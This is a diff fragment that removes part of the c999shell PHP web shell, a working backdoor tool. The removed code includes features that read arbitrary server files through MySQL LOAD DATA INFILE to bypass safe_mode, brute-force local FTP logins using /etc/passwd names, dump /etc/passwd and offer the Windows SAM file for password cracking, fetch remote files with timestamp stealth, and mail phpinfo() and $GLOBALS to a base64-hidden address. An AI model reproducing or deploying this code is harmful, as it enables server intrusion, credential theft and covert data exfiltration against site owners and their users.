-     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";

-     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}

-     echo "</table>";

-     mysql_free_result($result);

-    }

-    if ($sql_act == "processes")

-    {

-     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}

-     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);

-     echo "<center><b>Processes:</b><br><br>";

-     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";

-     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}

-     echo "</table>";

-     mysql_free_result($result);

-    }

-    if ($sql_act == "getfile")

-    {

-     $tmpdb = $sql_login."_tmpdb";

-     $select = mysql_select_db($tmpdb);

-     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}

-     if ($select)

-     {

-      $created = FALSE;

-      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");

-      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");

-      $result = mysql_query("SELECT * FROM tmp_file;");

-      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}

-      else

-      {

-       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}

-       $f = "";

-       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}

-       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}

-       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}

-       mysql_free_result($result);

-       mysql_query("DROP TABLE tmp_file;");

-      }

-     }

-     mysql_drop_db($tmpdb); //comment it if you want to leave database

-    }

-   }

-  }

- }

- echo "</td></tr></table>";

- if ($sql_sock)

- {

-  $affected = @mysql_affected_rows($sql_sock);

-  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}

-  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";

- }

- echo "</table>";

-}

-if ($act == "mkdir")

-{

- if ($mkdir != $d)

- {

-  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}

-  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}

-  echo "<br><br>";

- }

- $act = $dspact = "ls";

-}

-if ($act == "ftpquickbrute")

-{

- echo "<b>Ftp Quick brute:</b><br>";

- if (!win) {echo "This functions not work in Windows!<br><br>";}

- else

- {

-  function c999ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)

-  {

-   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}

-   else {$TRUE = TRUE;}

-   if ($TRUE)

-   {

-    $sock = @ftp_connect($host,$port,$timeout);

-    if (@ftp_login($sock,$login,$pass))

-    {

-     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";

-     ob_flush();

-     return TRUE;

-    }

-   }

-  }

-  if (!empty($submit))

-  {

-   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}

-   $fp = fopen("/etc/passwd","r");

-   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}

-   else

-   {

-    if ($fqb_logging)

-    {

-     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}

-     else {$fqb_logfp = FALSE;}

-     $fqb_log = "FTP Quick Brute (called c999shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";

-     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}

-    }

-    ob_flush();

-    $i = $success = 0;

-    $ftpquick_st = getmicrotime();

-    while(!feof($fp))

-    {

-     $str = explode(":",fgets($fp,2048));

-     if (c999ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))

-     {

-      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";

-      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";

-      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}

-      $success++;

-      ob_flush();

-     }

-     if ($i > $fqb_lenght) {break;}

-     $i++;

-    }

-    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}

-    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);

-    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";

-    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";

-    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}

-    if ($fqb_logemail) {@mail($fqb_logemail,"c999shell v. ".$shver." report",$fqb_log);}

-    fclose($fqb_logfp);

-   }

-  }

-  else

-  {

-   $logfile = $tmpdir_logs."c999sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";

-   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);

-   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";

-  }

- }

-}

-if ($act == "d")

-{

- if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}

- else

- {

-  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";

-  if (!$win)

-  {

-   echo "<tr><td><b>Owner/Group</b></td><td> ";

-   $ow = posix_getpwuid(fileowner($d));

-   $gr = posix_getgrgid(filegroup($d));

-   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));

-  }

-  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";

- }

-}

-if ($act == "phpinfo") {@ob_clean(); phpinfo(); c999shexit();}

-if ($act == "security")

-{

- echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";

- if (!$win)

- {

-  if ($nixpasswd)

-  {

-   if ($nixpasswd == 1) {$nixpasswd = 0;}

-   echo "<b>*nix /etc/passwd:</b><br>";

-   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}

-   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}

-   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";

-   $i = $nixpwd_s;

-   while ($i < $nixpwd_e)

-   {

-    $uid = posix_getpwuid($i);

-    if ($uid)

-    {

-     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";

-     echo join(":",$uid)."<br>";

-    }

-    $i++;

-   }

-  }

-  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}

- }

- else

- {

-  $v = $_SERVER["WINDIR"]."\repair\sam";

-  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}

-  else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}

- }

- if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}

- if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}

- if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}

- if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}

- if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}

- if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}

- if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}

- function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}

- displaysecinfo("OS Version?",myshellexec("cat /proc/version"));

- displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));

- displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));

- displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));

- displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));

- displaysecinfo("RAM",myshellexec("free -m"));

- displaysecinfo("HDD space",myshellexec("df -h"));

- displaysecinfo("List of Attributes",myshellexec("lsattr -a"));

- displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));

- displaysecinfo("Is cURL installed?",myshellexec("which curl"));

- displaysecinfo("Is lynx installed?",myshellexec("which lynx"));

- displaysecinfo("Is links installed?",myshellexec("which links"));

- displaysecinfo("Is fetch installed?",myshellexec("which fetch"));

- displaysecinfo("Is GET installed?",myshellexec("which GET"));

- displaysecinfo("Is perl installed?",myshellexec("which perl"));

- displaysecinfo("Where is apache",myshellexec("whereis apache"));

- displaysecinfo("Where is perl?",myshellexec("whereis perl"));

- displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));

- displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));

- displaysecinfo("locate my.conf",myshellexec("locate my.conf"));

- displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));

-}

-if ($act == "mkfile")

-{

- if ($mkfile != $d)

- {

-  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}

-  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}

-  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}

- }

- else {$act = $dspact = "ls";}

-}

-if ($act == "encoder")

-{

- echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";

- foreach(array("md5","crypt","sha1","crc32") as $v)

- {

-  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";

- }

- echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>

- <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>

- <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";

- echo "<center>base64_decode - ";

- if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}

- else

- {

-  $debase64 = base64_decode($encoder_input);

-  $debase64 = str_replace("\0","[0]",$debase64);

-  $a = explode("\r\n",$debase64);

-  $rows = count($a);

-  $debase64 = htmlspecialchars($debase64);

-  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}

-  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}

-  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";

- }

- echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";

- $c = strlen($encoder_input);

- for($i=0;$i<$c;$i++)

- {

-  $hex = dechex(ord($encoder_input[$i]));

-  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}

-  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}

- }

- echo "\" readonly><br></center></form>";

-}

-if ($act == "fsbuff")

-{

- $arr_copy = $sess_data["copy"];

- $arr_cut = $sess_data["cut"];

- $arr = array_merge($arr_copy,$arr_cut);

- if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}

- else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}

-}

-if ($act == "selfremove")

-{

- if (($submit == $rndcode) and ($submit != ""))

- {

-  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c999shell v.".$shver."!"; c999shexit(); }

-  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}

- }

- else

- {

-  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}

-  $rnd = rand(0,9).rand(0,9).rand(0,9);

-  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";

- }

-}

-if ($act == "update") {$ret = c999sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}}

-if ($act == "feedback")

-{

- $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1");

- if (!empty($submit))

- {

-  $ticket = substr(md5(microtime()+rand(1,1000)),0,6);

-  $body = "c999shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;

-  if (!empty($fdbk_ref))

-  {

-   $tmp = @ob_get_contents();

-   ob_clean();

-   phpinfo();

-   $phpinfo = base64_encode(ob_get_contents());

-   ob_clean();

-   echo $tmp;

-   $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";

-  }

-  mail($suppmail,"c999shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);

-  echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";

- }

- else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";}

-}

-if ($act == "search")

-{

- echo "<b>Search in file-system:</b><br>";

- if (empty($search_in)) {$search_in = $d;}

- if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}

- if (empty($search_text_wwo)) {$search_text_regexp = 0;}

- if (!empty($submit))

- {

-  $found = array();

-  $found_d = 0;

-  $found_f = 0;

-  $search_i_f = 0;

-  $search_i_d = 0;

-  $a = array

-  (

-   "name"=>$search_name, "name_regexp"=>$search_name_regexp,

-   "text"=>$search_text, "text_regexp"=>$search_text_regxp,

-   "text_wwo"=>$search_text_wwo,

-   "text_cs"=>$search_text_cs,

-   "text_not"=>$search_text_not

-  );

-  $searchtime = getmicrotime();

-  $in = array_unique(explode(";",$search_in));

-  foreach($in as $v) {c999fsearch($v);}

-  $searchtime = round(getmicrotime()-$searchtime,4);

-  if (count($found) == 0) {echo "<b>No files found!</b>";}

-  else

-  {

-   $ls_arr = $found;

-   $disp_fullpath = TRUE;

-   $act = "ls";

-  }

- }

- echo "<form method=POST>

-<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">

-<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp

-<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">

-<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>

-<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp

-&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only

-&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive

-&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text

-<br><br><input type=submit name=submit value=\"Search\"></form>";

- if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}

-}

-if ($act == "chmod")

-{

- $mode = fileperms($d.$f);

- if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}

- else

- {

-  $form = TRUE;

-  if ($chmod_submit)

-  {

-   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);

-   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}

-   else {$err = "Can't chmod to ".$octet.".";}

-  }

-  if ($form)

-  {

-   $perms = parse_perms($mode);

-   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";

-  }

- }

-}

-if ($act == "upload")

-{

- $uploadmess = "";

- $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);

- if (empty($uploadpath)) {$uploadpath = $d;}

- elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}

- if (!empty($submit))

- {

-  global $HTTP_POST_FILES;

-  $uploadfile = $HTTP_POST_FILES["uploadfile"];

-  if (!empty($uploadfile["tmp_name"]))

-  {

-   if (empty($uploadfilename)) {$destin = $uploadfile["name"];}

-   else {$destin = $userfilename;}

-   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";}

-  }

-  elseif (!empty($uploadurl))

-  {

-   if (!empty($uploadfilename)) {$destin = $uploadfilename;}

-   else

-   {

-    $destin = explode("/",$destin);

-    $destin = $destin[count($destin)-1];

-    if (empty($destin))

-    {

-     $i = 0;

-     $b = "";

-     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}

-   }

-   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}

-   else

-   {

-    $st = getmicrotime();

-    $content = @file_get_contents($uploadurl);

-    $dt = round(getmicrotime()-$st,4);

-    if (!$content) {$uploadmess .=  "Can't download file!<br>";}

-    else

-    {

-     if ($filestealth) {$stat = stat($uploadpath.$destin);}

-     $fp = fopen($uploadpath.$destin,"w");

-     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}

-     else

-     {

-      fwrite($fp,$content,strlen($content));

-      fclose($fp);

-      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}

-     }

-    }

-   }

-  }

- }

- if ($miniform)

- {

-  echo "<b>".$uploadmess."</b>";

-  $act = "ls";

- }

- else

- {

-  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>

-Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>

-Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>

-Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>

-File-name (auto-fill): <input name=uploadfilename size=25><br><br>

-<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>

-<input type=submit name=submit value=\"Upload\">

-</form>";

- }

-}

-if ($act == "delete")

-{

- $delerr = "";

- foreach ($actbox as $v)

- {

-  $result = FALSE;

-  $result = fs_rmobj($v);

-  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}

- }

- if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}

- $act = "ls";

-}

-if (!$usefsbuff)

-{

- if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}

-}

-else

-{

- if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c999_sess_put($sess_data); $act = "ls"; }

- elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c999_sess_put($sess_data); $act = "ls";}

- elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c999_sess_put($sess_data); $act = "ls";}

- if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c999_sess_put($sess_data);}

- elseif ($actpastebuff)

- {

-  $psterr = "";

-  foreach($sess_data["copy"] as $k=>$v)

-  {

-   $to = $d.basename($v);

-   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}

-   if ($copy_unset) {unset($sess_data["copy"][$k]);}

-  }

-  foreach($sess_data["cut"] as $k=>$v)

-  {

-   $to = $d.basename($v);

-   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}

-   unset($sess_data["cut"][$k]);

-  }

-  c999_sess_put($sess_data);

-  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}

-  $act = "ls";

- }

- elseif ($actarcbuff)

- {

-  $arcerr = "";

-  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}

-  else {$ext = ".tar.gz";}

-  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}

-  $cmdline .= " ".$actarcbuff_path;

-  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);

-  foreach($objects as $v)

-  {

-   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);

-   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}

-   if (is_dir($v))

-   {

-    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}

-    $v .= "*";

-   }

-   $cmdline .= " ".$v;

-  }

-  $tmp = realpath(".");

-  chdir($d);

-  $ret = myshellexec($cmdline);

-  chdir($tmp);

-  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}

